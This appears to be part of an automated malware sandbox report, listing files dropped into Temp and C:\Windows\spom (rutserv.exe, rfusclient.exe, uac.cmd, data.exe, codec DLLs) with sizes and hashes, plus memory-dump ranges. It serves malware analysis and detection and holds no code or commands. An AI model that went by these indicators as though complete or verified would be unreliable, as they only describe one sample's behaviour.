C:\Users\Admin\AppData\Local\Temp\rfusclient.exe

Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\rutserv.exe

Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Users\Admin\AppData\Local\Temp\uac.cmd

Filesize
10KB

MD5
547c86520f36394829ce6aaa9ff7d65c

SHA1
c31871a3085eb9cee026360ffd160e753b358115

SHA256
62b15fec3ebe65c24b4703524ec4b81864222db42db2feb172de9ca0edad0c87

SHA512
3f79bc3187b5f3f9ea106b673acb4958c157a625adcbb8e58adc65b2c399868754e028cd7e590ce64f827ec038450cb70b212f736f3803090ffbd7b945eb7491

Download Submit
C:\Users\Admin\AppData\Local\Temp\vp8decoder.dll

Filesize
127KB

MD5
bda3c03c3e5d65922a311009e0ae8cd6

SHA1
37093c457ac5f01649b4d23a3d075a531af08baa

SHA256
30dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290

SHA512
eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\vp8encoder.dll

Filesize
238KB

MD5
200cba4b9cbdd64f1a281b89cd1467f3

SHA1
fc3ccf8d57efcdc0d22b61ff6e49798d551a9118

SHA256
c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e

SHA512
15a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\webmmux.dll

Filesize
90KB

MD5
aa78ed008f72533c7136bf6d4bddb0d0

SHA1
2e9abd74e615adc99f561cbdbe6067dfd81a406a

SHA256
41e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11

SHA512
e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021

Download Submit
C:\Users\Admin\AppData\Local\Temp\webmvorbisdecoder.dll

Filesize
141KB

MD5
0867a260483876336a727cf9f2928b13

SHA1
3c8c59bfba6ed2aeef35c0d1fc4689683df1e660

SHA256
cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207

SHA512
b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f

Download Submit
C:\Users\Admin\AppData\Local\Temp\webmvorbisencoder.dll

Filesize
202KB

MD5
43adc4acd56c56b0a25664954c7aa80c

SHA1
d9085625b4a39b3969db8047ad3224b3fc9f60fc

SHA256
0e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918

SHA512
346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515

Download Submit
C:\Windows\spom\rfusclient.exe

Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
C:\Windows\spom\rfusclient.exe

Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
C:\Windows\spom\rfusclient.exe

Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
C:\Windows\spom\rfusclient.exe

Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
C:\Windows\spom\rutserv.exe

Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\rutserv.exe

Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\rutserv.exe

Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\rutserv.exe

Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
C:\Windows\spom\vp8decoder.dll

Filesize
127KB

MD5
bda3c03c3e5d65922a311009e0ae8cd6

SHA1
37093c457ac5f01649b4d23a3d075a531af08baa

SHA256
30dc5a63a43a00fb3bcacb696656dc302b9c090cf9c05df0f10123703ca07290

SHA512
eab8356896f05952e1bdfca467e998b23e5a9a5e5245f13d201f9b87b7a450be628c3513a8a4c40fa50ffaa8491c4508f1215c57ac608dd3e5e67290a5bedc0b

Download Submit
C:\Windows\spom\vp8encoder.dll

Filesize
238KB

MD5
200cba4b9cbdd64f1a281b89cd1467f3

SHA1
fc3ccf8d57efcdc0d22b61ff6e49798d551a9118

SHA256
c8529cff46283d4f7050c9f4ba42a6aad6ff580a22fc8f72bbedb17e63d4091e

SHA512
15a213790da6ddedc25369216ae725dccd16473599a8d5fd8b90f80aaa4fd20496f80e85a4ee5eae6a330930207cefc644ab704f7a6514bbf781151a38be38e3

Download Submit
C:\Windows\spom\webmmux.dll

Filesize
90KB

MD5
aa78ed008f72533c7136bf6d4bddb0d0

SHA1
2e9abd74e615adc99f561cbdbe6067dfd81a406a

SHA256
41e551ecb07620b4cace94a89bbcff6597df85a571ace50a7df929c9a94f1d11

SHA512
e9f49bc94909c46ae6dad9368e13cc758ff801c39ea8a459483bd17a8a40664b68c91d8602da588a84a39de9256e0accafb23a7667fb57640a55280ee61f4021

Download Submit
C:\Windows\spom\webmvorbisdecoder.dll

Filesize
141KB

MD5
0867a260483876336a727cf9f2928b13

SHA1
3c8c59bfba6ed2aeef35c0d1fc4689683df1e660

SHA256
cbc192c03b91280eb4561386290e3b346147d5b1362224d1deff781ff89be207

SHA512
b1d2518adb513c42ed877f1ee77d227d6d3600fc27b4d747f31b75cbfb85c53802cbf9b1fe0e1d09353ea4c29b6a49d5e7b7967b3fd8d15974d822649ca7a83f

Download Submit
C:\Windows\spom\webmvorbisencoder.dll

Filesize
202KB

MD5
43adc4acd56c56b0a25664954c7aa80c

SHA1
d9085625b4a39b3969db8047ad3224b3fc9f60fc

SHA256
0e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918

SHA512
346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515

Download Submit
\Users\Admin\AppData\Local\Temp\data.exe

Filesize
819KB

MD5
71a944406c89ab321cb1e55c37916d70

SHA1
be6ee2015475bdc1a665b1e6b86e86fcc1025c91

SHA256
4f10edbc89298118923bdb78d1f9e12406b85f34729d8a7ee4dec74f38baaa96

SHA512
9ad4c3ad397643344ff93be905db8ae88afb61c4915873e88332b3fa00021ec5ffa858d32885dd9d374ae3d96d5913eba79f2706aef0b541121f7794d86b1cda

Download Submit
\Windows\spom\rfusclient.exe

Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
\Windows\spom\rfusclient.exe

Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
\Windows\spom\rfusclient.exe

Filesize
1.8MB

MD5
3afec4347159849e4ef50d179ff1fed7

SHA1
9b3e00d0a426c622ddc34fbee96595d41bd8db72

SHA256
7ee8203360bf7c114e892664fda4bf66d15db67f6d3192a692b6bc9bc457998f

SHA512
aa99927b06e5fefffee73124ac7ace117b74a4087090109f705c36f44f6beb5e856a55c63238c7ffc73eaba37fbd15f855ca1232cc22371039031abd8fd25bf4

Download Submit
\Windows\spom\rutserv.exe

Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
\Windows\spom\rutserv.exe

Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
\Windows\spom\rutserv.exe

Filesize
6.3MB

MD5
93a4649d70ce76d6815874fc7a72c6fb

SHA1
1e9f663fd9cb66140001847849ddf0451365233f

SHA256
6dee2aa6f4bd56f39fc6bcc46746373da93674a8cdab0525741432c7d8080203

SHA512
a678b124bb10e83b69ec07939aca9ab249f192585b36eb630f3fe2383584514949eaefc0c611196f3dcdd079c8abee3113c11328fb2a9d231eb48d1d1aa5f0c3

Download Submit
memory/1220-122-0x0000000000400000-0x0000000000AE6000-memory.dmp

Filesize
6.9MB

Download
memory/1220-127-0x0000000004140000-0x0000000004826000-memory.dmp

Filesize
6.9MB

Download
memory/1220-132-0x0000000000400000-0x0000000000AE6000-memory.dmp

Filesize
6.9MB

Download
memory/1344-54-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download
memory/1344-56-0x0000000000400000-0x00000000004D5000-memory.dmp

Filesize
852KB

Download
memory/1344-55-0x0000000074F41000-0x0000000074F43000-memory.dmp

Filesize
8KB

Download
memory/1368-128-0x0000000000400000-0x0000000000AE6000-memory.dmp

Filesize
6.9MB

Download
memory/1748-120-0x0000000002DD0000-0x00000000034B6000-memory.dmp

Filesize
6.9MB

Download
memory/1748-129-0x0000000002DD0000-0x00000000034B6000-memory.dmp

Filesize
6.9MB

Download
memory/1748-130-0x0000000002DD0000-0x00000000034B6000-memory.dmp

Filesize
6.9MB

Download
memory/1748-115-0x0000000002DD0000-0x00000000034B6000-memory.dmp

Filesize
6.9MB

Download
memory/2044-121-0x0000000000400000-0x0000000000AE6000-memory.dmp

Filesize
6.9MB

Download
memory/2044-131-0x0000000000400000-0x0000000000AE6000-memory.dmp

Filesize
6.9MB

Download